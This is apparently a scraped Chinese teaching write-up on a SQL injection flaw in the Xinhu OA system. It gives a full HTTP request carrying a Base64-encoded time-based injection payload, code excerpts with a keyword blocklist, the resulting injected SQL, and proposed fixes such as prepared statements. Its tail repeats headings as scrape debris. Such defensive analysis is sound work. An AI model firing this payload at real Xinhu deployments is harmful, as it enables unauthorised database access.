信呼OA SQL注入漏洞分析与防御教学文档<\/h1>

漏洞概述<\/h2>
信呼OA系统存在一个SQL注入漏洞，攻击者可以通过精心构造的请求绕过系统的安全防护机制，执行恶意SQL语句。该漏洞属于逻辑绕过漏洞，利用了系统对Base64编码参数的特殊处理方式。<\/p>

环境搭建<\/h2>
下载源码：https:\/\/github.com\/rainrocka\/xinhu<\/code><\/li>
使用PHPstudy搭建环境<\/li>
初始账号密码：admin\/admin<\/li>
首次登录后需强制修改密码<\/li>
<\/ol>
漏洞复现<\/h2>
攻击Payload<\/h3>
GET<\/span> \/api.php?a=getmfilv&m=upload|api&d=task&fileid=1&fname=MScgYW5kIHNsZWVwKDYpIw== HTTP<\/span>\/<\/span>1.1<\/span>
<\/span><\/span>Host:<\/span> xinhu:5348<\/span>
<\/span><\/span>User-Agent:<\/span> Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/131.0.0.0 Safari\/537.36<\/span>
<\/span><\/span>Accept:<\/span> *\/*<\/span>
<\/span><\/span>X-Requested-With:<\/span> XMLHttpRequest<\/span>
<\/span><\/span>Referer:<\/span> http:\/\/xinhu:5348\/<\/span>
<\/span><\/span>Accept-Encoding:<\/span> gzip, deflate, br<\/span>
<\/span><\/span>Accept-Language:<\/span> zh-CN,zh;q=0.9<\/span>
<\/span><\/span>Cookie:<\/span> PHPSESSID=920tmlvqknnacst79p9c5d3h66; deviceid=1735887216564; xinhu_mo_adminid=oo0ob0vv0bdd0bhb0kr0bhh0bbk0oo0gb0rd0bhx0oo0ro0oe0gr06; xinhu_ca_adminuser=admin; xinhu_ca_rempass=1; xinhu_ca_adminpass=oo0rx0oe0bdd0or0kr0rg0gh06<\/span>
<\/span><\/span>Connection:<\/span> keep-alive<\/span>
<\/span><\/span><\/code><\/pre>关键参数：<\/p>

fname=MScgYW5kIHNsZWVwKDYpIw==<\/code> (Base64解码后为1' and sleep(6)#<\/code>)<\/li>
<\/ul>
漏洞分析<\/h2>
请求处理流程<\/h3>

请求路由：api.php<\/code>根据m<\/code>和a<\/code>参数路由到对应控制器方法<\/li>
参数处理：

m=upload|api<\/code>：表示先加载upload模块，然后调用api模块<\/li>
a=getmfilv<\/code>：调用getmfilvAction<\/code>方法<\/li>
d=task<\/code>：目录参数<\/li>
fileid=1<\/code>：文件ID<\/li>
fname<\/code>：文件名参数（Base64编码）<\/li>
<\/ul>
<\/li>
<\/ol>
关键代码分析<\/h3>
1. 参数获取流程<\/h4>
uploadAction.php<\/code>中的getmfilvAction<\/code>方法：<\/p>
public<\/span> function<\/span> getmfilvAction<\/span>() {
<\/span><\/span>    $fileid =<\/span> (int<\/span>)$this-><\/span>get<\/span>('fileid'<\/span>,'0'<\/span>);
<\/span><\/span>    $frs =<\/span> m<\/span>('file'<\/span>)-><\/span>getone<\/span>($fileid);
<\/span><\/span>    if<\/span>(!<\/span>$frs)return<\/span> returnerror<\/span>('不存在'<\/span>);
<\/span><\/span>    
<\/span><\/span>    $lujing =<\/span> $frs['filepathout'<\/span>];
<\/span><\/span>    if<\/span>(isempt<\/span>($lujing)){
<\/span><\/span>        $lujing =<\/span> $frs['filepath'<\/span>];
<\/span><\/span>        if<\/span>(substr<\/span>($lujing,0<\/span>,4<\/span>)!=<\/span>'http'<\/span> &&<\/span> !<\/span>file_exists<\/span>($lujing))return<\/span> returnerror<\/span>('文件不存在了'<\/span>);
<\/span><\/span>    }
<\/span><\/span>    
<\/span><\/span>    $fileext =<\/span> $frs['fileext'<\/span>];
<\/span><\/span>    $fname =<\/span> $this-><\/span>jm<\/span>-><\/span>base64decode<\/span>($this-><\/span>get<\/span>('fname'<\/span>));
<\/span><\/span>    $fname =<\/span> (isempt<\/span>($fname)) ?<\/span> $frs['filename'<\/span>] :<\/span> $fname.<\/span>'.'<\/span>.<\/span>$fileext.<\/span>''<\/span>;
<\/span><\/span>    
<\/span><\/span>    $filepath =<\/span> ''<\/span>.<\/span>UPDIR<\/span>.<\/span>'\/'<\/span>.<\/span>date<\/span>('Y-m'<\/span>).<\/span>'\/'<\/span>.<\/span>date<\/span>('d'<\/span>).<\/span>'_rocktpl'<\/span>.<\/span>rand<\/span>(1000<\/span>,9999<\/span>).<\/span>'_'<\/span>.<\/span>$fileid.<\/span>'.'<\/span>.<\/span>$fileext.<\/span>''<\/span>;
<\/span><\/span>    $this-><\/span>rock<\/span>-><\/span>createtxt<\/span>($filepath, file_get_contents<\/span>($lujing));
<\/span><\/span>    
<\/span><\/span>    $uarr =<\/span> array<\/span>(
<\/span><\/span>        'filename'<\/span> =><\/span> $fname,
<\/span><\/span>        'fileext'<\/span> =><\/span> $fileext,
<\/span><\/span>        'filepath'<\/span> =><\/span> $filepath,
<\/span><\/span>        'filesize'<\/span> =><\/span> filesize<\/span>($filepath),
<\/span><\/span>        'filesizecn'<\/span> =><\/span> $this-><\/span>rock<\/span>-><\/span>formatsize<\/span>(filesize<\/span>($filepath)),
<\/span><\/span>        'optid'<\/span> =><\/span> $this-><\/span>adminid<\/span>,
<\/span><\/span>        'optname'<\/span> =><\/span> $this-><\/span>adminname<\/span>,
<\/span><\/span>        'adddt'<\/span> =><\/span> $this-><\/span>rock<\/span>-><\/span>now<\/span>,
<\/span><\/span>        'ip'<\/span> =><\/span> $this-><\/span>rock<\/span>-><\/span>ip<\/span>,
<\/span><\/span>        'web'<\/span> =><\/span> $this-><\/span>rock<\/span>-><\/span>web<\/span>,
<\/span><\/span>    );
<\/span><\/span>    
<\/span><\/span>    $uarr['id'<\/span>] =<\/span> m<\/span>('file'<\/span>)-><\/span>insert<\/span>($uarr);
<\/span><\/span>    return<\/span> returnsuccess<\/span>($uarr);
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>2. 安全防护机制<\/h4>
rockClass.php<\/code>中的get<\/code>和jmuncode<\/code>方法：<\/p>
public<\/span> function<\/span> get<\/span>($name,$dev=<\/span>''<\/span>, $lx=<\/span>0<\/span>) {
<\/span><\/span>    $val=<\/span>$dev;
<\/span><\/span>    if<\/span>(isset<\/span>($_GET[$name]))$val=<\/span>$_GET[$name];
<\/span><\/span>    if<\/span>($this-><\/span>isempt<\/span>($val))$val=<\/span>$dev;
<\/span><\/span>    return<\/span> $this-><\/span>jmuncode<\/span>($val, $lx, $name);
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>public<\/span> function<\/span> jmuncode<\/span>($s, $lx=<\/span>0<\/span>, $na=<\/span>''<\/span>) {
<\/span><\/span>    $jmbo =<\/span> false<\/span>;$s =<\/span> (string<\/span>)$s;
<\/span><\/span>    if<\/span>($lx==<\/span>3<\/span>)$jmbo =<\/span> $this-><\/span>isjm<\/span>($s);
<\/span><\/span>    if<\/span>(substr<\/span>($s, 0<\/span>, 7<\/span>)==<\/span>'rockjm_'<\/span> ||<\/span> $lx ==<\/span> 1<\/span> ||<\/span> $jmbo){
<\/span><\/span>        $s =<\/span> str_replace<\/span>('rockjm_'<\/span>,''<\/span>,$s);
<\/span><\/span>        $s =<\/span> $this-><\/span>jm<\/span>-><\/span>uncrypt<\/span>($s);
<\/span><\/span>        if<\/span>($lx==<\/span>1<\/span>){
<\/span><\/span>            $jmbo =<\/span> $this-><\/span>isjm<\/span>($s);
<\/span><\/span>            if<\/span>($jmbo)$s =<\/span> $this-><\/span>jm<\/span>-><\/span>uncrypt<\/span>($s);
<\/span><\/span>        }
<\/span><\/span>    }
<\/span><\/span>    if<\/span>(substr<\/span>($s, 0<\/span>, 7<\/span>)==<\/span>'basejm_'<\/span> ||<\/span> $lx==<\/span>5<\/span>){
<\/span><\/span>        $s =<\/span> str_replace<\/span>('basejm_'<\/span>,''<\/span>,$s);
<\/span><\/span>        $s =<\/span> $this-><\/span>jm<\/span>-><\/span>base64decode<\/span>($s);
<\/span><\/span>    }
<\/span><\/span>    $s=<\/span>str_replace<\/span>('39'<\/span>,"'"<\/span>,$s);
<\/span><\/span>    $s=<\/span>str_replace<\/span>('%20'<\/span>,' '<\/span>,$s);
<\/span><\/span>    if<\/span>($lx==<\/span>2<\/span>)$s=<\/span>str_replace<\/span>(array<\/span>('[H1]'<\/span>,'[H2]'<\/span>),array<\/span>('<'<\/span>,'>'<\/span>),$s);
<\/span><\/span>    
<\/span><\/span>    $str =<\/span> strtolower<\/span>($s);
<\/span><\/span>    foreach<\/span>($this-><\/span>lvlaras<\/span> as<\/span> $v1)if<\/span>($this-><\/span>contain<\/span>($str, $v1)){
<\/span><\/span>        $this-><\/span>debug<\/span>(''<\/span>.<\/span>$na.<\/span>'《'<\/span>.<\/span>$s.<\/span>'》error:包含非法字符《'<\/span>.<\/span>$v1.<\/span>'》'<\/span>,'params_err'<\/span>);
<\/span><\/span>        $s =<\/span> $this-><\/span>lvlarrep<\/span>($str, $v1);
<\/span><\/span>        $str =<\/span> $s;
<\/span><\/span>    }
<\/span><\/span>    
<\/span><\/span>    $cslv =<\/span> array<\/span>('m'<\/span>,'a'<\/span>,'p'<\/span>,'d'<\/span>,'ip'<\/span>,'web'<\/span>,'host'<\/span>,'ajaxbool'<\/span>,'token'<\/span>,'adminid'<\/span>);
<\/span><\/span>    if<\/span>(in_array<\/span>($na, $cslv))$s =<\/span> $this-><\/span>xssrepstr<\/span>($s);
<\/span><\/span>    return<\/span> $this-><\/span>reteistrs<\/span>($s);
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>黑名单定义（__construct<\/code>方法中）：<\/p>
$this-><\/span>lvlaras<\/span> =<\/span> explode<\/span>(','<\/span>,'select , alter table,delete ,drop ,update ,insert into,load_file,\/*,*\/,union,<script,<\/script,sleep(,outfile,eval(,user(,phpinfo(),select*,union%20,sleep%20,select%20,delete%20,drop%20,and%20'<\/span>);
<\/span><\/span>$this-><\/span>lvlaraa<\/span> =<\/span> explode<\/span>(','<\/span>,'select,alter,delete,drop,update,\/*,*\/,insert,from,time_so_sec,convert,from_unixtime,unix_timestamp,curtime,time_format,union,concat,information_schema,group_concat,length,load_file,outfile,database,system_user,current_user,user(),found_rows,declare,master,exec,(),select*from,select*'<\/span>);
<\/span><\/span><\/code><\/pre>3. SQL执行流程<\/h4>
mysql.php<\/code>中的record<\/code>方法：<\/p>
public<\/span> function<\/span> record<\/span>($table,$array,$where=<\/span>''<\/span>) {
<\/span><\/span>    $addbool =<\/span> true<\/span>;
<\/span><\/span>    if<\/span>(!<\/span>$this-><\/span>isempt<\/span>($where))$addbool=<\/span>false<\/span>;
<\/span><\/span>    $cont =<\/span> ''<\/span>;
<\/span><\/span>    if<\/span>(is_array<\/span>($array)){
<\/span><\/span>        foreach<\/span>($array as<\/span> $key=><\/span>$val){
<\/span><\/span>            $cont.=<\/span>",`<\/span>$key<\/span>`="<\/span>.<\/span>$this-><\/span>toaddval<\/span>($val).<\/span>""<\/span>;
<\/span><\/span>        }
<\/span><\/span>        $cont =<\/span> substr<\/span>($cont,1<\/span>);
<\/span><\/span>    }else<\/span>{
<\/span><\/span>        $cont =<\/span> $array;
<\/span><\/span>    }
<\/span><\/span>    $table =<\/span> $this-><\/span>gettables<\/span>($table);
<\/span><\/span>    if<\/span>($addbool){
<\/span><\/span>        $sql=<\/span>"insert into <\/span>$table<\/span> set <\/span>$cont<\/span>"<\/span>;
<\/span><\/span>    }else<\/span>{
<\/span><\/span>        $where =<\/span> $this-><\/span>getwhere<\/span>($where);
<\/span><\/span>        $sql=<\/span>"update <\/span>$table<\/span> set <\/span>$cont<\/span> where <\/span>$where<\/span>"<\/span>;
<\/span><\/span>    }
<\/span><\/span>    return<\/span> $this-><\/span>tranbegin<\/span>($sql);
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>漏洞原理<\/h3>

Base64编码绕过<\/strong>：系统对fname<\/code>参数进行Base64解码，但安全检测是在解码前进行的，导致黑名单检测失效<\/li>
SQL拼接问题<\/strong>：解码后的恶意内容直接拼接到SQL语句中，没有进行适当的转义或参数化处理<\/li>
黑名单不完善<\/strong>：即使检测到恶意内容，也只是替换而非阻断请求<\/li>
<\/ol>
最终生成的恶意SQL语句：<\/p>
insert<\/span> into<\/span> `<\/span>xinhu_file`<\/span> set<\/span> `<\/span>filename`=<\/span>'1'<\/span> and<\/span> sleep(6<\/span>)#<\/span>.png',`fileext`='<\/span>png',`filepath`='<\/span>upload\/<\/span>2025<\/span>-<\/span>01<\/span>\/<\/span>03<\/span>_rocktpl5508_1.png',`filesize`='<\/span>3970<\/span>',`filesizecn`='<\/span>3<\/span>.88<\/span> KB',`optid`='<\/span>1<\/span>',`optname`='<\/span>绠绠$悊悊鍛<\/span>',`adddt`='<\/span>2025<\/span>-<\/span>01<\/span>-<\/span>03<\/span> 16<\/span>:51<\/span>:57<\/span>',`ip`='<\/span>127<\/span>.0<\/span>.0<\/span>.1<\/span>',`web`='<\/span>Chrome'
<\/span><\/span><\/span><\/code><\/pre>防御方案<\/h2>
1. 输入验证改进<\/h3>
\/\/ 修改jmuncode方法，增加对解码后内容的检测
<\/span><\/span><\/span><\/span>public<\/span> function<\/span> jmuncode<\/span>($s, $lx=<\/span>0<\/span>, $na=<\/span>''<\/span>) {
<\/span><\/span>    \/\/ ...原有代码...
<\/span><\/span><\/span><\/span>    
<\/span><\/span>    \/\/ Base64解码后增加安全检测
<\/span><\/span><\/span><\/span>    if<\/span>(substr<\/span>($s, 0<\/span>, 7<\/span>)==<\/span>'basejm_'<\/span> ||<\/span> $lx==<\/span>5<\/span>){
<\/span><\/span>        $s =<\/span> str_replace<\/span>('basejm_'<\/span>,''<\/span>,$s);
<\/span><\/span>        $s =<\/span> $this-><\/span>jm<\/span>-><\/span>base64decode<\/span>($s);
<\/span><\/span>        
<\/span><\/span>        \/\/ 新增：对解码后的内容进行安全检测
<\/span><\/span><\/span><\/span>        $tempStr =<\/span> strtolower<\/span>($s);
<\/span><\/span>        foreach<\/span>($this-><\/span>lvlaras<\/span> as<\/span> $v1) {
<\/span><\/span>            if<\/span>($this-><\/span>contain<\/span>($tempStr, $v1)) {
<\/span><\/span>                $this-><\/span>debug<\/span>(''<\/span>.<\/span>$na.<\/span>'《'<\/span>.<\/span>$s.<\/span>'》error:包含非法字符《'<\/span>.<\/span>$v1.<\/span>'》'<\/span>,'params_err'<\/span>);
<\/span><\/span>                return<\/span> ''<\/span>; \/\/ 直接返回空值，而不是尝试替换
<\/span><\/span><\/span><\/span>            }
<\/span><\/span>        }
<\/span><\/span>    }
<\/span><\/span>    
<\/span><\/span>    \/\/ ...原有代码...
<\/span><\/span><\/span><\/span>}
<\/span><\/span><\/code><\/pre>2. 使用参数化查询<\/h3>
修改record<\/code>方法，使用预处理语句：<\/p>
public<\/span> function<\/span> record<\/span>($table,$array,$where=<\/span>''<\/span>) {
<\/span><\/span>    $addbool =<\/span> true<\/span>;
<\/span><\/span>    if<\/span>(!<\/span>$this-><\/span>isempt<\/span>($where))$addbool=<\/span>false<\/span>;
<\/span><\/span>    
<\/span><\/span>    $table =<\/span> $this-><\/span>gettables<\/span>($table);
<\/span><\/span>    
<\/span><\/span>    if<\/span>($addbool){
<\/span><\/span>        \/\/ 使用预处理语句
<\/span><\/span><\/span><\/span>        $keys =<\/span> array<\/span>();
<\/span><\/span>        $values =<\/span> array<\/span>();
<\/span><\/span>        $placeholders =<\/span> array<\/span>();
<\/span><\/span>        
<\/span><\/span>        foreach<\/span>($array as<\/span> $key=><\/span>$val){
<\/span><\/span>            $keys[] =<\/span> "`<\/span>$key<\/span>`"<\/span>;
<\/span><\/span>            $placeholders[] =<\/span> "?"<\/span>;
<\/span><\/span>            $values[] =<\/span> $this-><\/span>toaddval<\/span>($val);
<\/span><\/span>        }
<\/span><\/span>        
<\/span><\/span>        $sql =<\/span> "INSERT INTO <\/span>$table<\/span> ("<\/span>.<\/span>implode<\/span>(','<\/span>, $keys).<\/span>") VALUES ("<\/span>.<\/span>implode<\/span>(','<\/span>, $placeholders).<\/span>")"<\/span>;
<\/span><\/span>        return<\/span> $this-><\/span>executePrepared<\/span>($sql, $values);
<\/span><\/span>    }else<\/span>{
<\/span><\/span>        $where =<\/span> $this-><\/span>getwhere<\/span>($where);
<\/span><\/span>        \/\/ 同样修改update部分...
<\/span><\/span><\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>private<\/span> function<\/span> executePrepared<\/span>($sql, $params) {
<\/span><\/span>    $stmt =<\/span> $this-><\/span>link<\/span>-><\/span>prepare<\/span>($sql);
<\/span><\/span>    if<\/span>(!<\/span>$stmt) return<\/span> false<\/span>;
<\/span><\/span>    
<\/span><\/span>    $types =<\/span> str_repeat<\/span>('s'<\/span>, count<\/span>($params));
<\/span><\/span>    $stmt-><\/span>bind_param<\/span>($types, ...<\/span>$params);
<\/span><\/span>    $result =<\/span> $stmt-><\/span>execute<\/span>();
<\/span><\/span>    $stmt-><\/span>close<\/span>();
<\/span><\/span>    
<\/span><\/span>    return<\/span> $result;
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>3. 增强黑名单机制<\/h3>

增加更多危险SQL关键词<\/li>
对编码后的攻击特征进行检测<\/li>
实现白名单验证机制，特别是对文件名等参数<\/li>
<\/ol>
4. 输出编码<\/h3>
对所有输出到数据库的内容进行适当的编码处理：<\/p>
function<\/span> toaddval<\/span>($val) {
<\/span><\/span>    if<\/span>(is_array<\/span>($val) ||<\/span> is_object<\/span>($val))$val =<\/span> json_encode<\/span>($val);
<\/span><\/span>    if<\/span>(is_bool<\/span>($val))$val =<\/span> $val ?<\/span> '1'<\/span> :<\/span> '0'<\/span>;
<\/span><\/span>    if<\/span>(is_null<\/span>($val))$val =<\/span> ''<\/span>;
<\/span><\/span>    
<\/span><\/span>    \/\/ 增加对字符串的严格过滤
<\/span><\/span><\/span><\/span>    if<\/span>(is_string<\/span>($val)) {
<\/span><\/span>        $val =<\/span> $this-><\/span>link<\/span>-><\/span>real_escape_string<\/span>($val);
<\/span><\/span>        $val =<\/span> "'"<\/span>.<\/span>$val.<\/span>"'"<\/span>;
<\/span><\/span>    }
<\/span><\/span>    return<\/span> $val;
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>总结<\/h2>
该漏洞的根本原因是：<\/p>

安全检测与参数处理的顺序不当（先检测后解码）<\/li>
依赖黑名单而非白名单或参数化查询<\/li>
对用户输入过度信任，缺乏深度防御<\/li>
<\/ol>
完整修复需要：<\/p>

调整安全检测顺序<\/li>
实现参数化查询<\/li>
增强输入验证<\/li>
实施输出编码<\/li>
考虑使用ORM框架替代直接SQL操作<\/li>
<\/ol>
信呼OA SQL注入漏洞分析与防御教学文档<\/h1>

漏洞概述<\/h2> 信呼OA系统存在一个SQL注入漏洞，攻击者可以通过精心构造的请求绕过系统的安全防护机制，执行恶意SQL语句。该漏洞属于逻辑绕过漏洞，利用了系统对Base64编码参数的特殊处理方式。<\/p>

漏洞复现<\/h2>

漏洞分析<\/h2>

关键代码分析<\/h3>

防御方案<\/h2>

漏洞概述<\/h2>
信呼OA系统存在一个SQL注入漏洞，攻击者可以通过精心构造的请求绕过系统的安全防护机制，执行恶意SQL语句。该漏洞属于逻辑绕过漏洞，利用了系统对Base64编码参数的特殊处理方式。<\/p>
